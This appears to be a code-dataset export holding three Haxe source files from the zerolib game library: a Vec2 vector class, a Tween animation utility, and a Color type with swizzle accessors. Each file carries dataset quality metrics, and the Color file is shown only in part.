repo_id stringlengths 6 101 | file_path stringlengths 2 269 | content stringlengths 367 5.14M | size int64 367 5.14M | filename stringlengths 1 248 | ext stringlengths 0 87 | lang stringclasses 88 values | program_lang stringclasses 232 values | doc_type stringclasses 5 values | quality_signal stringlengths 2 1.9k | effective stringclasses 2 values | hit_map stringlengths 2 1.4k |
|---|---|---|---|---|---|---|---|---|---|---|---|
01010111/zerolib | zero/utilities/Vec2.hx | package zero.utilities;
using Math;
using zero.extensions.FloatExt;
/**
* A simple Vector class
*
* **Usage:**
*
* - Initialize using Vec2.get() `var vec = Vec2.get(0, 0);`
* - Recycle vectors when you're done with them: `my_vector.put()`
*/
abstract Vec2(Array<Float>) {
static var pool:Array<Vec2> = [];
public static var UP = Vec2.get(0, -1);
public static var DOWN = Vec2.get(0, 1);
public static var LEFT = Vec2.get(-1, 0);
public static var RIGHT = Vec2.get(1, 0);
public static var use_radians:Bool = false;
public static function get(x:Float = 0, y:Float = 0):Vec2 {
if (pool.length > 0) return pool.shift().set(x, y);
return new Vec2(x, y);
}
static function zero(v:Float) return Math.abs(v) <= 1e-8 ? 0 : v;
public var radians(get, set):Float;
public var length(get, set):Float;
public var x(get, set):Float;
public var y(get, set):Float;
public var angle(get, set):Float;
public var degrees(get, set):Float;
public function new(x:Float, y:Float) {
this = [Math.atan2(y, x), Math.sqrt(x * x + y * y)];
}
public function set(x:Float = 0, y:Float = 0):Vec2 {
length = Math.sqrt(x * x + y * y);
radians = Math.atan2(y, x);
return cast this;
}
public inline function put() {
this = [];
pool.push(cast this);
}
public inline function normalize() return set(x / length, y / length);
public inline function scale(scalar:Float) return set(x * scalar, y * scalar);
public inline function dot(v:Vec2):Float return zero(x * v.x + y * v.y);
public inline function cross(v:Vec2):Float return zero(x * v.y - y * v.x);
public inline function distance(v:Vec2):Float return Math.sqrt(Math.pow(x - v.x, 2) + Math.pow(y - v.y, 2));
public inline function rad_between(v:Vec2):Float return Math.atan2(v.y - y, v.x - x);
public inline function deg_between(v:Vec2):Float return Math.atan2(v.y - y, v.x - x) * (180 / Math.PI);
public inline function angle_between(v:Vec2):Float return use_radians ? rad_between(v) : deg_between(v);
public inline function in_circle(cx:Float, cy:Float, cr:Float) return Math.sqrt(Math.pow(x - cx, 2) + Math.pow(y - cy, 2)) <= cr;
public inline function copy_from(v:Vec2) return set(v.x, v.y);
public inline function copy():Vec2 return Vec2.get(x, y);
public inline function toString() return 'x:$x, y:$y, length:$length, angle:$angle';
function get_radians() return this[0];
function get_length() return Math.abs(this[1]);
function get_x() return zero(length * Math.cos(radians));
function get_y() return zero(length * Math.sin(radians));
function get_angle() return use_radians ? radians : degrees;
function get_degrees() return radians * (180 / Math.PI);
function set_radians(v) return this[0] = v;
function set_length(v) {
if (v < 0.0) radians += Math.PI;
return this[1] = Math.abs(v);
}
function set_x(v:Float) {
if (this[2] == v) return v;
this[2] = v;
var y = get_y();
length = Math.sqrt(v * v + y * y);
radians = Math.atan2(y, v);
return v;
}
function set_y(v:Float) {
if (this[3] == v) return v;
this[3] = v;
var x = get_x();
length = Math.sqrt(x * x + v * v);
radians = Math.atan2(v, x);
return v;
}
function set_degrees(v:Float) {
radians = v * (Math.PI / 180);
return v;
}
function set_angle(v:Float) {
radians = use_radians ? v : v * (Math.PI / 180);
return v;
}
@:op(A + B) static function add(v1:Vec2, v2:Vec2) return Vec2.get(v1.x + v2.x, v1.y + v2.y);
@:op(A - B) static function subtract(v1:Vec2, v2:Vec2) return Vec2.get(v1.x - v2.x, v1.y - v2.y);
@:op(A * B) static function dot_product(v1:Vec2, v2:Vec2) return v1.dot(v2);
@:op(A / B) static function cross_product(v1:Vec2, v2:Vec2) return v1.cross(v2);
@:op(A == B) static function is_equal(v1:Vec2, v2:Vec2) return v1.radians == v2.radians && v1.length == v2.length;
@:op(A + B) static function add_float(v1:Vec2, f:Float) return Vec2.get(v1.x + f, v1.y + f);
@:op(A - B) static function subtract_float(v1:Vec2, f:Float) return Vec2.get(v1.x - f, v1.y - f);
@:op(A * B) static function multiply_float(v1:Vec2, f:Float) return Vec2.get(v1.x * f, v1.y * f);
@:op(A / B) static function divide_float(v1:Vec2, f:Float) return Vec2.get(v1.x / f, v1.y / f);
} | 4,192 | Vec2 | hx | en | haxe | code | {"qsc_code_num_words": 735, "qsc_code_num_chars": 4192.0, "qsc_code_mean_word_length": 3.68435374, "qsc_code_frac_words_unique": 0.13605442, "qsc_code_frac_chars_top_2grams": 0.03360414, "qsc_code_frac_chars_top_3grams": 0.09601182, "qsc_code_frac_chars_top_4grams": 0.03323486, "qsc_code_frac_chars_dupe_5grams": 0.42171344, "qsc_code_frac_chars_dupe_6grams": 0.32791728, "qsc_code_frac_chars_dupe_7grams": 0.24963072, "qsc_code_frac_chars_dupe_8grams": 0.14475628, "qsc_code_frac_chars_dupe_9grams": 0.14475628, "qsc_code_frac_chars_dupe_10grams": 0.14475628, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03712297, "qsc_code_frac_chars_whitespace": 0.17748092, "qsc_code_size_file_byte": 4192.0, "qsc_code_num_lines": 119.0, "qsc_code_num_chars_line_max": 131.0, "qsc_code_num_chars_line_mean": 35.22689076, "qsc_code_frac_chars_alphabet": 0.74825986, "qsc_code_frac_chars_comments": 0.04341603, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04444444, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00997258, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/Tween.hx | package zero.utilities;
using Math;
using Std;
using zero.extensions.FloatExt;
/**
* A utility for interpolating between numbers over time
*
* **Usage**
*
* - Import into your project. `import zero.utilities.Tween;`
*/
/**
A utility for interpolating between numbers over time
**Usage**
Before any tweens can be active, make sure you're updating the tween manager in your project with the time from the last frame (delta time):
```haxe
Tween.update(delta_time);
```
Then you can create a tween by passing the object with the variable to tween, and then any other settings. For instance, this will move an object's position to x: 50, y: 100 in 2 seconds:
```haxe
Tween.get(my_object).prop({ x: 50, y: 100 }).duration(2);
```
**/
class Tween {
static var active_tweens:Array<Tween> = [];
static var pool:Array<Tween> = [];
/**
* Initialize and return a new Tween
*/
public static function get(target:Dynamic) {
var tween = pool.shift();
if (tween == null) tween = new Tween();
tween.init(target);
tween.active = true;
active_tweens.push(tween);
return tween;
}
public static function tween(target:Dynamic, duration:Float, properties:Dynamic, ?options:TweenOptions):Tween {
var t = Tween.get(target).duration(duration).prop(properties);
if (options == null) return t;
if (options.delay != null) t.delay(options.delay);
if (options.ease != null) t.ease(options.ease);
if (options.type != null) t.type(options.type);
if (options.on_complete != null) t.on_complete(options.on_complete);
return t;
}
/**
* Updates all active Tweens
*/
public static function update(dt:Float) {
for (tween in active_tweens) tween.update_tween(dt);
}
/**
* Tween.active determines whether to update a tween or not
*/
public var active:Bool = true;
public var data:TweenData;
var period:Float;
var reverse:Bool;
/**
* Sets the duration of a Tween
*/
public function duration(time:Float) {
data.duration = time;
return this;
}
/**
* Sets the properties and values to use in a Tween
*/
public function prop(properties:Dynamic) {
for (field in Reflect.fields(properties)) {
var start = Reflect.getProperty(data.target, field);
if (data.target.isOfType(Array)) {
switch field {
case 'x', 'r' : start = data.target[0];
case 'y', 'g' : start = data.target[1];
case 'z', 'b', 'width' : start = data.target[2];
case 'w', 'a', 'height' : start = data.target[3];
}
}
data.properties.push({
field: field,
start: start == null ? 0 : start,
end: Reflect.field(properties, field)
});
}
return this;
}
public function from_to(field:String, from:Dynamic, to:Dynamic) {
data.properties.push({
field: field,
start: from,
end: to
});
return this;
}
/**
* Sets the easing function to be used by a Tween
*/
public function ease(ease:Float -> Float) {
data.ease = ease;
return this;
}
/**
* Sets a period of time to wait before a Tween becomes active
*/
public function delay(time:Float) {
data.delay = time;
data.delay_ref = time;
return this;
}
/**
* Sets a callback function that is called when a Tween completes
*/
public function on_complete(fn:Void -> Void) {
data.on_complete = fn;
return this;
}
/**
* Sets the playback type of a Tween
*/
public function type(type:TweenType) {
data.type = type;
reverse = switch type {
case SINGLE_SHOT_FORWARDS | LOOP_FORWARDS | PING_PONG: false;
case SINGLE_SHOT_BACKWARDS | LOOP_BACKWARDS: true;
}
return this;
}
public function get_period():Float {
return period;
}
/**
* Sets the period or progress of a Tween (0-1)
*/
public function set_period(period:Float) {
this.period = period.min(1).max(0);
return this;
}
/**
* Get the duration of a Tween
*/
public function get_duration():Float {
if (data == null) return -1;
return data.duration;
}
/**
* Sets the duration of a Tween
*/
public function set_duration(duration:Float) {
if (data == null) return;
data.duration = duration;
}
/**
* Cancels a Tween and recycles it
*/
public function destroy() {
data = null;
active_tweens.remove(this);
active = false;
pool.push(this);
}
private function new() {}
function init(target:Dynamic) {
data = get_default_data(target);
period = 0;
reverse = false;
}
function get_default_data(target:Dynamic):TweenData {
return {
target: target,
duration: 1,
properties: [],
ease: (f) -> f,
delay: 0,
delay_ref: 0,
on_complete: () -> {},
type: SINGLE_SHOT_FORWARDS,
}
}
public function update_tween(dt:Float) {
if (!active) return;
dt = update_dt(dt);
update_period(dt);
}
function update_dt(dt:Float):Float {
if (data.delay > 0) {
data.delay -= dt;
if (data.delay > 0) return 0;
dt = -data.delay;
}
return dt;
}
function update_period(dt:Float) {
if (dt == 0) return;
var d = dt/data.duration;
period += reverse ? -d : d;
period = period.min(1).max(0);
if (period == 0 || period == 1) complete();
else apply();
}
function complete() {
apply();
data.on_complete();
switch data.type {
case SINGLE_SHOT_FORWARDS | SINGLE_SHOT_BACKWARDS: destroy();
case LOOP_FORWARDS | LOOP_BACKWARDS | PING_PONG: reset();
}
}
function reset() {
if (data.type == PING_PONG) reverse = !reverse;
data.delay = data.delay_ref;
period = reverse ? 1 : 0;
}
function apply() {
if (data == null) return;
var eased_period = data.ease(period);
for (property in data.properties) {
var val = eased_period.map(0, 1, property.start, property.end);
if (data.target.isOfType(Array)) {
switch property.field {
case 'x', 'r' : data.target[0] = val;
case 'y', 'g' : data.target[1] = val;
case 'z', 'b', 'width' : data.target[2] = val;
case 'w', 'a', 'height' : data.target[3] = val;
}
}
else Reflect.setProperty(data.target, property.field, val);
}
}
}
typedef TweenOptions = {
?ease:Float -> Float,
?type:TweenType,
?delay:Float,
?on_complete:Void -> Void,
}
typedef TweenData = {
target:Dynamic,
duration:Float,
properties:Array<TweenProperty>,
ease:Float -> Float,
delay:Float,
delay_ref:Float,
on_complete:Void -> Void,
type:TweenType,
}
typedef TweenProperty = {
field:String,
start:Dynamic,
end:Dynamic,
}
enum TweenType {
SINGLE_SHOT_FORWARDS;
SINGLE_SHOT_BACKWARDS;
LOOP_FORWARDS;
LOOP_BACKWARDS;
PING_PONG;
} | 6,473 | Tween | hx | en | haxe | code | {"qsc_code_num_words": 878, "qsc_code_num_chars": 6473.0, "qsc_code_mean_word_length": 4.74145786, "qsc_code_frac_words_unique": 0.20615034, "qsc_code_frac_chars_top_2grams": 0.03362959, "qsc_code_frac_chars_top_3grams": 0.01729522, "qsc_code_frac_chars_top_4grams": 0.02882537, "qsc_code_frac_chars_dupe_5grams": 0.17991833, "qsc_code_frac_chars_dupe_6grams": 0.13812155, "qsc_code_frac_chars_dupe_7grams": 0.05020418, "qsc_code_frac_chars_dupe_8grams": 0.0422772, "qsc_code_frac_chars_dupe_9grams": 0.02450156, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00821918, "qsc_code_frac_chars_whitespace": 0.21056697, "qsc_code_size_file_byte": 6473.0, "qsc_code_num_lines": 296.0, "qsc_code_num_chars_line_max": 190.0, "qsc_code_num_chars_line_mean": 21.86824324, "qsc_code_frac_chars_alphabet": 0.80645793, "qsc_code_frac_chars_comments": 0.21195736, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.08955224, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00744806, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
01010111/zerolib | zero/utilities/Color.hx | package zero.utilities;
using Math;
using StringTools;
/**
* A color abstract of Vec4
*
* **Usage:**
*
* - Initialize using Color.get() `var color = Color.get(1, 0, 0, 1); // red`
* - Or with an array `var color:Color = [0, 1, 0, 1]; // green`
* - Or using a 32 bit Integer `var color = Color.get().from_int32(0xFF0000FF); // blue`
* - Get/set various details like `color.hue`, `color.saturation`, and more
* - Swizzle like you're using GLSL! `var yellow = red.rrba;`
* - Register and use colors in a global palette `Color.PALETTE.set('pico 8 red', Color.get().from_int32(0xFFFF004D));` / `var red = Color.PALETTE['pico 8 red'];`
* - Recycle colors when you're done with them: `my_color.put()`
*/
@:forward
abstract Color(Vec4)
{
public static var RED:Color = [1, 0, 0, 1];
public static var YELLOW:Color = [1, 1, 0, 1];
public static var GREEN:Color = [0, 1, 0, 1];
public static var CYAN:Color = [0, 1, 1, 1];
public static var BLUE:Color = [0, 0, 1, 1];
public static var MAGENTA:Color = [1, 0, 1, 1];
public static var WHITE:Color = [1, 1, 1, 1];
public static var BLACK:Color = [0, 0, 0, 1];
public static var TRANSPARENT:Color = [1, 1, 1, 0];
public static var GREY:Color = [0.5, 0.5, 0.5, 1];
@:dox(hide) public static var PICO_8_BLACK:Color = [0, 0, 0, 1];
@:dox(hide) public static var PICO_8_DARK_BLUE:Color = [29/255, 43/255, 83/255, 1];
@:dox(hide) public static var PICO_8_DARK_PURPLE:Color = [126/255, 37/255, 83/255, 1];
@:dox(hide) public static var PICO_8_DARK_GREEN:Color = [0, 135/255, 81/255, 1];
@:dox(hide) public static var PICO_8_BROWN:Color = [171/255, 82/255, 54/255, 1];
@:dox(hide) public static var PICO_8_DARK_GREY:Color = [95/255, 87/255, 79/255, 1];
@:dox(hide) public static var PICO_8_LIGHT_GREY:Color = [194/255, 195/255, 199/255, 1];
@:dox(hide) public static var PICO_8_WHITE:Color = [1, 241/255, 232/255, 1];
@:dox(hide) public static var PICO_8_RED:Color = [1, 0, 77/255, 1];
@:dox(hide) public static var PICO_8_ORANGE:Color = [1, 163/255, 0, 1];
@:dox(hide) public static var PICO_8_YELLOW:Color = [1, 236/255, 39/255, 1];
@:dox(hide) public static var PICO_8_GREEN:Color = [0, 228/255, 54/255, 1];
@:dox(hide) public static var PICO_8_BLUE:Color = [41/255, 173/255, 1, 1];
@:dox(hide) public static var PICO_8_INDIGO:Color = [131/255, 118/255, 156/255, 1];
@:dox(hide) public static var PICO_8_PINK:Color = [1, 119/255, 168/255, 1];
@:dox(hide) public static var PICO_8_PEACH:Color = [1, 204/255, 170/255, 1];
public static var PALETTE:Map<String, Color> = new Map();
static var epsilon:Float = 1e-8;
static function zero(n:Float):Float return n.abs() <= epsilon ? 0 : n;
static var pool:Array<Color> = [];
public static function get(red:Float = 0, green:Float = 0, blue:Float = 0, alpha:Float = 1):Color return pool != null && pool.length > 0 ? pool.shift().set(red, green, blue, alpha) : new Color(red, green, blue, alpha);
public inline function put()
{
pool.push(cast this);
this = null;
}
@:from static function from_array_float(input:Array<Float>) return Color.get(input[0], input[1], input[2], input[3]);
@:from static function from_array_int(input:Array<Int>) return Color.get(input[0], input[1], input[2], input[3]);
@:arrayAccess function arr_set(n:Int, v:Float) n < 0 || n > 3 ? return : this[n] = v;
@:arrayAccess function arr_get(n:Int):Float return this[n.min(3).max(0).floor()];
public var red (get, set):Float;
inline function get_red() return this.x;
inline function set_red(v:Float) return this.x = v.max(0).min(1);
public var green (get, set):Float;
inline function get_green() return this.y;
inline function set_green(v:Float) return this.y = v.max(0).min(1);
public var blue (get, set):Float;
inline function get_blue() return this.z;
inline function set_blue(v:Float) return this.z = v.max(0).min(1);
public var alpha (get, set):Float;
inline function get_alpha() return this.w;
inline function set_alpha(v:Float) return this.w = v.max(0).min(1);
public var red_int (get, set):Int;
inline function get_red_int() return (this.x * 255).round();
inline function set_red_int(v)
{
this.x = v/255;
return v;
}
public var green_int (get, set):Int;
inline function get_green_int() return (this.y * 255).round();
inline function set_green_int(v)
{
this.y = v/255;
return v;
}
public var blue_int (get, set):Int;
inline function get_blue_int() return (this.z * 255).round();
inline function set_blue_int(v)
{
this.z = v/255;
return v;
}
public var alpha_int (get, set):Int;
inline function get_alpha_int() return (this.w * 255).round();
inline function set_alpha_int(v)
{
this.w = v/255;
return v;
}
public var hue (get, set):Float;
inline function get_hue() return (Math.atan2(Math.sqrt(3) * (green - blue), 2 * red - green - blue) != 0) ? ((180 / Math.PI * Math.atan2(Math.sqrt(3) * (green - blue), 2 * red - green - blue)) + 360) % 360 : 0;
inline function set_hue(hue:Float)
{
set_HSL(hue, saturation, lightness);
return hue;
}
public var saturation(get, set):Float;
inline function get_saturation() return (max_color() - min_color()) / brightness;
inline function set_saturation(saturation)
{
set_HSL(hue, saturation, lightness);
return saturation;
}
public var lightness(get, set):Float;
inline function get_lightness() return (max_color() + min_color()) / 2;
inline function set_lightness(lightness)
{
set_HSL(hue, saturation, lightness);
return lightness;
}
public var brightness(get, set):Float;
inline function get_brightness() return max_color();
inline function set_brightness(brightness)
{
set_HSV(hue, saturation, brightness);
return brightness;
}
inline function new(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0) this = [x, y, z, w];
public inline function set(x:Float = 0, y:Float = 0, z:Float = 0, w:Float = 0):Color
{
this[0] = zero(x);
this[1] = zero(y);
this[2] = zero(z);
this[3] = zero(w);
return cast this;
}
inline function max_color():Float return Math.max(red, Math.max(green, blue));
inline function min_color():Float return Math.min(red, Math.min(green, blue));
public inline function to_hex():Int return ((alpha * 255).round() & 0xFF) << 24 | ((red * 255).round() & 0xFF) << 16 | ((green * 255).round() & 0xFF) << 8 | ((blue * 255).round() & 0xFF);
public inline function to_hex_24():Int return ((red * 255).round() & 0xFF) << 16 | ((green * 255).round() & 0xFF) << 8 | ((blue * 255).round() & 0xFF);
public inline function from_int32(color:Int) return set(((color >> 16) & 0xff) / 255, ((color >> 8) & 0xff) / 255, (color & 0xff) / 255, ((color >> 24) & 0xff) / 255);
public inline function equals(color:Color) return red == color.red && green == color.green && blue == color.blue && alpha == color.alpha;
public inline function toString():String return 'r: $red | g: $green | b: $blue | a: $alpha | #${to_hex().hex()}';
public function set_HSL(h:Float, s:Float, l:Float):Color
{
h /= 360;
set_from_hue(h);
var C = (1 - (2 * l - 1).abs()) * s;
return cast (this - 0.5) * C + l;
}
public function set_HSV(h:Float, s:Float, v:Float):Color
{
set_from_hue(hue);
red = ((red - 1) * s + 1) * v;
green = ((green - 1) * s + 1) * v;
blue = ((blue - 1) * s + 1) * v;
return cast this;
}
public function set_from_hue(hue:Float):Color
{
red = (hue * 6 - 3).abs() - 1;
green = 2 - (hue * 6 - 2).abs();
blue = 2 - (hue * 6 - 4).abs();
return cast this;
}
@:op(A + B) static function add(v1:Color, v2:Color):Color return Color.get(v1.x + v2.x, v1.y + v2.y, v1.z + v2.z, v1.w + v2.w);
@:op(A + B) static function add_f(v:Color, n:Float):Color return Color.get(v.x + n, v.y + n, v.z + n, v.w + n);
@:op(A - B) static function subtract(v1:Color, v2:Color):Color return Color.get(v1.x - v2.x, v1.y - v2.y, v1.z - v2.z, v1.w - v2.w);
@:op(A - B) static function subtract_f(v:Color, n:Float):Color return Color.get(v.x - n, v.y - n, v.z - n, v.w - n);
@:op(A * B) static function multiply(v1:Color, v2:Color):Color return Color.get(v1.x * v2.x, v1.y * v2.y, v1.z * v2.z, v1.w * v2.w);
@:op(A * B) static function multiply_f(v:Color, n:Float):Color return Color.get(v.x * n, v.y * n, v.z * n, v.w * n);
@:op(A / B) static function divide(v1:Color, v2:Color):Color return Color.get(v1.x / v2.x, v1.y / v2.y, v1.z / v2.z, v1.w / v2.w);
@:op(A / B) static function divide_f(v:Color, n:Float):Color return Color.get(v.x / n, v.y / n, v.z / n, v.w / n);
@:op(A % B) static function mod(v1:Color, v2:Color):Color return Color.get(v1.x % v2.x, v1.y % v2.y, v1.z % v2.z, v1.w % v2.w);
@:op(A % B) static function mod_f(v:Color, n:Float):Color return Color.get(v.x % n, v.y % n, v.z % n, v.w % n);
@:dox(hide) public var rrr (get, never):Vec3; private function get_rrr() return Vec3.get(red, red, red);
@:dox(hide) public var rrg (get, never):Vec3; private function get_rrg() return Vec3.get(red, red, green);
@:dox(hide) public var rrb (get, never):Vec3; private function get_rrb() return Vec3.get(red, red, blue);
@:dox(hide) public var rgr (get, never):Vec3; private function get_rgr() return Vec3.get(red, green, red);
@:dox(hide) public var rgg (get, never):Vec3; private function get_rgg() return Vec3.get(red, green, green);
@:dox(hide) public var rgb (get, never):Vec3; private function get_rgb() return Vec3.get(red, green, blue);
@:dox(hide) public var rbr (get, never):Vec3; private function get_rbr() return Vec3.get(red, blue, red);
@:dox(hide) public var rbg (get, never):Vec3; private function get_rbg() return Vec3.get(red, blue, green);
@:dox(hide) public var rbb (get, never):Vec3; private function get_rbb() return Vec3.get(red, blue, blue);
@:dox(hide) public var grr (get, never):Vec3; private function get_grr() return Vec3.get(green, red, red);
@:dox(hide) public var grg (get, never):Vec3; private function get_grg() return Vec3.get(green, red, green);
@:dox(hide) public var grb (get, never):Vec3; private function get_grb() return Vec3.get(green, red, blue);
@:dox(hide) public var ggr (get, never):Vec3; private function get_ggr() return Vec3.get(green, green, red);
@:dox(hide) public var ggg (get, never):Vec3; private function get_ggg() return Vec3.get(green, green, green);
@:dox(hide) public var ggb (get, never):Vec3; private function get_ggb() return Vec3.get(green, green, blue);
@:dox(hide) public var gbr (get, never):Vec3; private function get_gbr() return Vec3.get(green, blue, red);
@:dox(hide) public var gbg (get, never):Vec3; private function get_gbg() return Vec3.get(green, blue, green);
@:dox(hide) public var gbb (get, never):Vec3; private function get_gbb() return Vec3.get(green, blue, blue);
@:dox(hide) public var brr (get, never):Vec3; private function get_brr() return Vec3.get(blue, red, red);
@:dox(hide) public var brg (get, never):Vec3; private function get_brg() return Vec3.get(blue, red, green);
@:dox(hide) public var brb (get, never):Vec3; private function get_brb() return Vec3.get(blue, red, blue);
@:dox(hide) public var bgr (get, never):Vec3; private function get_bgr() return Vec3.get(blue, green, red);
@:dox(hide) public var bgg (get, never):Vec3; private function get_bgg() return Vec3.get(blue, green, green);
@:dox(hide) public var bgb (get, never):Vec3; private function get_bgb() return Vec3.get(blue, green, blue);
@:dox(hide) public var bbr (get, never):Vec3; private function get_bbr() return Vec3.get(blue, blue, red);
@:dox(hide) public var bbg (get, never):Vec3; private function get_bbg() return Vec3.get(blue, blue, green);
@:dox(hide) public var bbb (get, never):Vec3; private function get_bbb() return Vec3.get(blue, blue, blue);
@:dox(hide) public var rrrr (get, never):Color; private function get_rrrr() return Color.get(red, red, red, red);
@:dox(hide) public var rrrg (get, never):Color; private function get_rrrg() return Color.get(red, red, red, green);
@:dox(hide) public var rrrb (get, never):Color; private function get_rrrb() return Color.get(red, red, red,blue);
@:dox(hide) public var rrra (get, never):Color; private function get_rrra() return Color.get(red, red, red, alpha);
@:dox(hide) public var rrgr (get, never):Color; private function get_rrgr() return Color.get(red, red, green, red);
@:dox(hide) public var rrgg (get, never):Color; private function get_rrgg() return Color.get(red, red, green, green);
@:dox(hide) public var rrgb (get, never):Color; private function get_rrgb() return Color.get(red, red, green,blue);
@:dox(hide) public var rrga (get, never):Color; private function get_rrga() return Color.get(red, red, green, alpha);
@:dox(hide) public var rrbr (get, never):Color; private function get_rrbr() return Color.get(red, red, blue, red);
@:dox(hide) public var rrbg (get, never):Color; private function get_rrbg() return Color.get(red, red, blue, green);
@:dox(hide) public var rrbb (get, never):Color; private function get_rrbb() return Color.get(red, red, blue,blue);
@:dox(hide) public var rrba (get, never):Color; private function get_rrba() return Color.get(red, red, blue, alpha);
@:dox(hide) public var rrar (get, never):Color; private function get_rrar() return Color.get(red, red, alpha, red);
@:dox(hide) public var rrag (get, never):Color; private function get_rrag() return Color.get(red, red, alpha, green);
@:dox(hide) public var rrab (get, never):Color; private function get_rrab() return Color.get(red, red, alpha,blue);
@:dox(hide) public var rraa (get, never):Color; private function get_rraa() return Color.get(red, red, alpha, alpha);
@:dox(hide) public var rgrr (get, never):Color; private function get_rgrr() return Color.get(red, green, red, red);
@:dox(hide) public var rgrg (get, never):Color; private function get_rgrg() return Color.get(red, green, red, green);
@:dox(hide) public var rgrb (get, never):Color; private function get_rgrb() return Color.get(red, green, red,blue);
@:dox(hide) public var rgra (get, never):Color; private function get_rgra() return Color.get(red, green, red, alpha);
@:dox(hide) public var rggr (get, never):Color; private function get_rggr() return Color.get(red, green, green, red);
@:dox(hide) public var rggg (get, never):Color; private function get_rggg() return Color.get(red, green, green, green);
@:dox(hide) public var rggb (get, never):Color; private function get_rggb() return Color.get(red, green, green,blue);
@:dox(hide) public var rgga (get, never):Color; private function get_rgga() return Color.get(red, green, green, alpha);
@:dox(hide) public var rgbr (get, never):Color; private function get_rgbr() return Color.get(red, green, blue, red);
@:dox(hide) public var rgbg (get, never):Color; private function get_rgbg() return Color.get(red, green, blue, green);
@:dox(hide) public var rgbb (get, never):Color; private function get_rgbb() return Color.get(red, green, blue,blue);
@:dox(hide) public var rgba (get, never):Color; private function get_rgba() return Color.get(red, green, blue, alpha);
@:dox(hide) public var rgar (get, never):Color; private function get_rgar() return Color.get(red, green, alpha, red);
@:dox(hide) public var rgag (get, never):Color; private function get_rgag() return Color.get(red, green, alpha, green);
@:dox(hide) public var rgab (get, never):Color; private function get_rgab() return Color.get(red, green, alpha,blue);
@:dox(hide) public var rgaa (get, never):Color; private function get_rgaa() return Color.get(red, green, alpha, alpha);
@:dox(hide) public var rbrr (get, never):Color; private function get_rbrr() return Color.get(red, blue, red, red);
@:dox(hide) public var rbrg (get, never):Color; private function get_rbrg() return Color.get(red, blue, red, green);
@:dox(hide) public var rbrb (get, never):Color; private function get_rbrb() return Color.get(red, blue, red,blue);
@:dox(hide) public var rbra (get, never):Color; private function get_rbra() return Color.get(red, blue, red, alpha);
@:dox(hide) public var rbgr (get, never):Color; private function get_rbgr() return Color.get(red, blue, green, red);
@:dox(hide) public var rbgg (get, never):Color; private function get_rbgg() return Color.get(red, blue, green, green);
@:dox(hide) public var rbgb (get, never):Color; private function get_rbgb() return Color.get(red, blue, green,blue);
@:dox(hide) public var rbga (get, never):Color; private function get_rbga() return Color.get(red, blue, green, alpha);
@:dox(hide) public var rbbr (get, never):Color; private function get_rbbr() return Color.get(red, blue, blue, red);
@:dox(hide) public var rbbg (get, never):Color; private function get_rbbg() return Color.get(red, blue, blue, green);
@:dox(hide) public var rbbb (get, never):Color; private function get_rbbb() return Color.get(red, blue, blue,blue);
